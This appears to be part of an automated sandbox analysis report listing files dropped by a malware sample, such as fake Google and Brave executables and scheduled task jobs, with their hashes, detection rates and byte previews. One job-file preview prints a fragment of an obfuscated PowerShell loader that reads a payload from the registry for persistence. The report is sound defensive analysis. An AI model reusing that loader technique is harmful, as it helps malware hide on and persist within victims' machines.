Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<...xb..xb..xb.....rb......b.....lb.....Tb.....ib..*...lb.....}b..xb..,b.....{b...i.yb.....yb..Richxb..........................PE..L.....qc.................2....`......o.......P....@..........................Pb.......b...@.................................D.\.<.... ]......................0b.\|.....\.......................\.......\.@............P...............................text...30.......2.................. ..`.rdata....[..P....[..6..............@..@.data.........].......\.............@....rsrc........ ].......\.............@..@.reloc..\|....0b.......a.............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\ofg.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	6.270431868500399
Encrypted:	false
SSDEEP:	1536:apyR0Fl1K6g0e8hsEvKAxtE4zo8Sw7Ky7NGHjQR54z5sW0cd/cbPpGA/uYEmsn:a9l1Ed8hsEfLoBw7p7B54p/uPpGA/VEr
MD5:	33DAD992607D0FFD44D2C81FE67F8FB1
SHA1:	E5B67DC05505FB1232504231F41CBA225C282D3C
SHA-256:	95903D8C2D48C4C0667E41878807F646F7648A33ED25D0EB433AAB41C25E31A4
SHA-512:	444973B44292C433A07E5F75F6580EA71799B1F835677BC5B2E42AF6B567A2F70F1B038F019D250A18216701CCF901B300632487EEBCC1113AC803EDB43159E4
Malicious:	true
Yara Hits:	Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via IExecuteCommand COM object, Source: C:\Users\user\AppData\Local\Google\ofg.exe, Author: ditekSHen
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 27%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}f.I9...9...9....u..3....u.......u..-...kr......kr..(...kr..*....u..0...9...X....r..8....r=.8....r..8...Rich9...........................PE..L...oz~c.............................$............@.......................................@..................................L..d...............................L....?..8....................@.......?..@...............T............................text............................... ..`.rdata...d.......f..................@..@.data........`.......<..............@....rsrc................F..............@..@.reloc..L............H..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2843
Entropy (8bit):	5.3371553026862095
Encrypted:	false
SSDEEP:	48:MxHKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHK1HjHKg:iqXeqm00YqhQnouOqLqdqNq2qzcGtIxU
MD5:	DCF12DDFCA2FD2701AE5EA0012964E90
SHA1:	AB37B70FB4E34C888BEFFFF54BA5AE34373C816B
SHA-256:	3B28B517A00543FA53ADC147DB9996DF6FF59D002FF65823D5625B44B2D1A406
SHA-512:	5D35EA912835CEB875896F9971225643642245BC6E356AF0D1B370CF4488CE7390D525E526256B9231511DACF4762094D219F20129D96C59778CEF91DDF06538
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	45177
Entropy (8bit):	5.072498410577891
Encrypted:	false
SSDEEP:	768:PkWNxV3IpNBQkj25h4iUxuaV7frRJv5FVvCxHBG75ard35n9QOdBQNWzktAHkaN2:PkAxV3CNBQkj25h4iUxuaV7flJnVv6HA
MD5:	79EA83B42F934BED47A1B30D85AB0999
SHA1:	D5AD1B90152F5C698A714FC8044C52571EFCD57B
SHA-256:	9DDA715941C069B34C2052F8902BD6FE9C4956DD2F9E8713F8AD72032BD9662B
SHA-512:	6BDD1F73F199EE5A8BC2EB6FF1B13197E1303B2548932F071EA67A657B5D0056605C5FFC3BAEC02AFDF29A5425BCFA003BA607041A462C2A851B59AF0999567C
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE.F..._.>....?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1........Export-Certificate........Get-CertificateNotificationTask........Get-PfxData........New-CertificateNotificationTask........Import-PfxCertificate....#...Set-CertificateAutoEnrollmentPolicy........Export-PfxCertificate........Switch-Certificate........New-SelfSignedCertificate....%...Get-CertificateEnrollmentPolicyServer....%...Add-CertificateEnrollmentPolicyServer....(...Remove-CertificateEnrollmentPolicyServer........Import-Certificate........Test-Certificate........Get-Certificate...."...Remove-CertificateNotificationTask....#...Get-CertificateAutoEnrollmentPolicy........_t.....q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...R

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	21704
Entropy (8bit):	5.479982414298014
Encrypted:	false
SSDEEP:	384:wtCRzTTA25e+pdV0915SVpm2JmQu0EMNsInp5Z0FRVrdshVFqLvQv3++nYs:mWVY/UA2JmQVN5bOpGOv9s
MD5:	D1EFDB6DE952719BB4FBB0BF47373DB0
SHA1:	BE0CC82875216DADC45AD29EFA3F293B92B28ACD
SHA-256:	C3F7774A3CBD02C44E13A0955144C99A2ADAC50457C73313FCEB30F171CC31F0
SHA-512:	D7909653242D65AECE07618E8601628FE7D28C314C9B64061DEB5AAB86EEFD04257E29AD859A7738CE25F1186AF0B4C2243AFD0B747DDD49693DC32DE2E42306
Malicious:	false
Reputation:	unknown
Preview:	@...e...................Q.................L..........@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\54A0.tmp

Download File

Process:	C:\Users\user\AppData\Local\Google\brave.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	335360
Entropy (8bit):	7.548086611496671
Encrypted:	false
SSDEEP:	6144:RBx7z3Bre16M01nguKBmmlbvx0zKGkl5EiCtuhNjtANJ4tDWhRaitlopYR:RnBreIfKNJVZotuhNZKxrYpI
MD5:	DA87A0A2ABA605908BF8B9A3F4377481
SHA1:	5CAC4EA0B3F0CC2D7C04655DB12AD0443CBAA5CF
SHA-256:	22EE7B8104599B47313195598FFC34AAFD6A6552DCCE0E7B3232CED3A90AC9A4
SHA-512:	55A8A27A013CB2C3DEDA81779D89AB956A5F57D00A155496ABC7BF3C5A87F3B7C41058AB3681CBBD0406F69EA01C4FFC3E5779C2CA676088A68CB87F19C34C28
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Reputation:	unknown
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$..........;..eh..eh..eh.fi..eh.`iS.eh..`i..eh..ai..eh..fi..eh.ai..eh.di..eh..dhE.eh^.li..eh^..h..eh...h..eh^.gi..ehRich..eh........PE..d......b.........."..........n......D..........@.............................`............`..................................................e..P...............(............P..d....Q..p............................P..@...............x............................text...0........................... ..`.rdata.............................@..@.data...X....p.......`..............@....pdata..(............l..............@..@_RDATA..\............\|..............@..@.rsrc................~..............@..@.reloc..d....P......................@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0msqkiyu.yf5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nluxmwe.fxz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0tfpebcf.jx0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1igh01jb.kfc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ik3p4zde.ahr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qjzgwzzk.jfi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_td2tl4ms.sew.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnylakok.bkn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wwukrtlw.whx.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfdwxoge.sbr.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\fl.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2525912
Entropy (8bit):	6.850111173933591
Encrypted:	false
SSDEEP:	49152:tj0qfdklIHNE/4oVLJq6USarmEmHjKG4xn9QXMzygr1oGF/m130+JWwSduNG00a:l0qfdGINE/4AFPerUHjyq8hr1oGFm30M
MD5:	098501D92E932B69246D3CC2AC8118BE
SHA1:	81E253F6F939969044B3031F2FFC0DCB41F3E635
SHA-256:	EA9C6C0B6B8223F07F44FAF6E10CC38D3BD5A2B27B360A0041346271FCC2C35F
SHA-512:	C2E5C04F7A8FF00672193A027259B71E5B14EE1E98F8E32B209EDD06A3D64358EAA682F33DD1BD2E5DA554A994103D4493FD08F9415B9FA0537A1BA536234085
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 54%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......................$..#..p&...............#...@...........................&.......&...@... ...............................%.x.... &..............t&......0&.0............................<%.......................%..............................text.....#.......#.................`.P`.data....7....#..8....#.............@.`..rdata........#.......#.............@.`@.bss..........%.......................`..idata..x.....%.......%.............@.0..CRT....8.....&.......%.............@.0..tls..........&.......%.............@.0..rsrc........ &.......%.............@.0..reloc..0....0&.......%.............@.0B........................................................................................................................................................................................................................................................................

C:\Windows\GoogleUpdate.exe

Download File

Process:	C:\Users\user\AppData\Local\Google\chrome.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	154456
Entropy (8bit):	5.948865342404173
Encrypted:	false
SSDEEP:	3072:UAt2Sb2m5oyiTOZQvfSERdX9Zk8ACB+6l4nfS3wjVSzpD2MhkNJoSloS+Zh52ruK:fxwjRjB+O+/H
MD5:	9A66A3DE2589F7108426AF37AB7F6B41
SHA1:	12950D906FF703F3A1E0BD973FCA2B433E5AB207
SHA-256:	A913415626433D5D0F07D3EC4084A67FF6F5138C3C3F64E36DD0C1AE4C423C65
SHA-512:	A4E81BFFBFA4D3987A8C10CEC5673FD0C8AECBB96104253731BFCAB645090E631786FF7BDE78607CBB2D242EE62051D41658059FCBBC4990C40DBB0FEC66FCD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3...w...w...w....cg.}....ce......cd.o......f......e......^....cy.z...w...........v.....i.v...w...M.......v...Richw...........................PE..L.....u`............................Bt.......0....@..........................`......g.....@.................................LQ..x....`..P............&..X5...P.......[..T............................[..@............P..H............................text...T........................... ..`.data........0......."..............@....idata.......P.......*..............@..@.rsrc...P....`.......4..............@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	17944
Entropy (8bit):	5.440875424209391
Encrypted:	false
SSDEEP:	384:qteJGhGTw+4W0IOwIETTlSVZEUAaeTCQLnfcySDOYb:KawWXxU2UjeTCQLEb
MD5:	1BCAF091203C1683A790904DB2DA3F69
SHA1:	8B2838078270B42D1522BA5E9D786A3483AE738D
SHA-256:	4B0B1880AF5B0B5D2B02564F428C623E2B41DAD672247197CCA6D5C84F83A214
SHA-512:	21A4B986121BE5DFEECDA4BAE9658C7DF119245F47A06389548DB37D6A25CE9476DD6AE91043F927D701E117E9108F034A21279367ECD42418579AB1DC07BFDE
Malicious:	false
Reputation:	unknown
Preview:	@...e...........9...............................................H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.883977562702998
Encrypted:	false
SSDEEP:	192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
MD5:	1F1446CE05A385817C3EF20CBD8B6E6A
SHA1:	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
SHA-256:	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
SHA-512:	252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1192
Entropy (8bit):	5.303256077534299
Encrypted:	false
SSDEEP:	24:3aBPpQrLAo4KAxX5qRPD42HZFe9t4CvKuKnKJJxb:qBPerB4nqRL/HZFe9t4Cv94arb
MD5:	881024516CBE7AEFA030EE5866CF93A0
SHA1:	875007370CE79BC3D89D5BAFFB1CE0F3E83791A4
SHA-256:	B36330DB3D60914058B0D0B5F4DD1B4CED7F45171034471CC63376C7079F59A4
SHA-512:	4EDD1FF0C10D5A22FAFF9FEA3451A870A2937511B96A54D78B308ED20B91ABA1CCFBC868E5559C3CA504C0DA38BAD6F6A8052E0932C2878D4661C65CC3F7E071
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Windows\Tasks\dialersvc32.job

Download File

Process:	C:\Windows\System32\dialer.exe
File Type:	data
Category:	dropped
Size (bytes):	1410
Entropy (8bit):	3.7430024261078354
Encrypted:	false
SSDEEP:	24:5DQ8zK5tG3HPnyff86avRYYKaHYb6sCbaHKBlcwPN0+svKz8:5DQu/6ahTGC2rS
MD5:	8E17DF88FB82B9C68183EAD6D407F153
SHA1:	D19DD656A92A4F4F12D344D5D3D33D53E5D8EC71
SHA-256:	C49CFB34C3D0E088C1B9DE9CABCF7C5A7EB13FE2C04F17B1315A4F62905244E3
SHA-512:	FD3FE92A86FAC4DE0869C4CCFC2562F5A9445F4CB5C6978188A0ACE01F93F465D23E3807BEC676A63A2E035F5CA18A1A442D1BC88C312CE9A2F7528574A7CF5C
Malicious:	false
Reputation:	unknown
Preview:	..........aO.F..a.j.F.P.....<... .....s.................................p.o.w.e.r.s.h.e.l.l...-."...(.\.".{.1.}.{.0.}.\.". .-.f. .'.e.T.'.,.'.S.'.). . .(.\.".6.T.\.".+.\.".o.\.".). . .(.[.t.Y.p.E.].(.\.".{.2.}.{.0.}.{.4.}.{.1.}.{.3.}.\.". .-.F.'.e.'.,.'.m.B.L.'.,.'.r.e.f.l.'.,.'.y.'.,.'.c.t.i.O.n...A.s.S.e.'.). . .). . .;. .$.D.l.r.4.S. .=. . .[.t.y.P.e.].(.\.".{.3.}.{.1.}.{.2.}.{.4.}.{.0.}.\.".-.F.'.R.y.'.,.'.o.S.O.f.T...W.'.,.'.i.N.3.2...R.'.,.'.M.I.C.R.'.,.'.e.G.i.S.T.'.). . .;. . .$.6.T.O.:.:.(.\.".{.0.}.{.1.}.\.". .-.f. .'.L.'.,.'.o.a.d.'.)...I.n.v.o.k.e.(. . .(...(.\.".{.1.}.{.2.}.{.0.}.\.". .-.f. .'.t.-.I.t.e.m.'.,.'.g.'.,.'.e.'.). .(.\.".v.A.R.I.\.".+.\.".A.b.\.".+.\.".l.E.\.".+.\.".:.D.l.R.4.S.\.".). . .)...\.".V.A.`.l.u.E.\.".:.:.\.".l.O.c.`.A.L.M.`.A.C.h.i.n.e.\."...(.\.".{.2.}.{.1.}.{.0.}.\.". .-.f. .'.e.y.'.,.'.u.b.k.'.,.'.O.p.e.n.S.'.)...I.n.v.o.k.e.(.(.\.".{.1.}.{.0.}.\.".-.f.'.E.'.,.'.S.O.F.T.W.A.R.'.).)...(.\.".{.1.}.{.0.}.{.2.}.\.". .-.f.'.u.'.,.'.G.e.t.V.a.l.'.,.'.e.

C:\Windows\Tasks\dialersvc64.job

Download File

Process:	C:\Windows\System32\dialer.exe
File Type:	data
Category:	dropped
Size (bytes):	1324
Entropy (8bit):	3.716096389566243
Encrypted:	false
SSDEEP:	24:1U8zK5tG3HPnyff86avRYYKaHYb6sCbaHKBlcwPNdz8:1Uu/6ahTGCn
MD5:	6C192B0735A3CAAC29160899771F897F
SHA1:	C66BCFC7224260DB2791345B7F764F66C560F3EF
SHA-256:	CFA2F76235189DE24FE3FBA80875717EBB31B18E943C83F7B13E11EA73D57BB7
SHA-512:	0947AB2E65036A421508BF5BD42D50A8BF344501818116F6374A18C143095338F3195C296FCC02819F5B41DE938A28AD393777F1E628668077B331D2804F72EC
Malicious:	false
Reputation:	unknown
